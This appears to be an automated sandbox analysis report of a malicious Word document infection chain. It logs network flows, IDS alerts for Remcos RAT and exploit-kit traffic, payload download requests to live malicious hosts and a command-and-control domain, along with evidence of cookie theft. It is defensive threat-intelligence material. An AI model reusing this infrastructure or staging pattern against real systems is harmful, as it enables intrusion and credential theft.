                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171

                  Networking

                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.90.89.98:6845
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 45.90.89.98:6845
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 91.134.96.177:80 -> 192.168.2.22:49173
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 91.134.96.177:80 -> 192.168.2.22:49173
                  Source: Malware configuration extractor | URLs: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 45.90.89.98:6845
                  Source: global traffic | HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /80/WRRDFC.txt HTTP/1.1Host: 91.134.96.177Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox View | IP Address: 104.21.78.54
                  Source: Joe Sandbox View | IP Address: 45.90.89.98
                  Source: Joe Sandbox View | IP Address: 185.199.109.133
                  Source: Joe Sandbox View | ASN Name: CMCSUS
                  Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global traffic | HTTP traffic detected: GET /S7UYq0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.134.96.177Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.134.96.177Connection: Keep-Alive
                  Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A829E0A-7FC7-4D01-A6EB-6F0871F5882C}.tmp
                  Source: global traffic | HTTP traffic detected: GET /S7UYq0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.134.96.177Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.134.96.177Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /80/WRRDFC.txt HTTP/1.1Host: 91.134.96.177Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
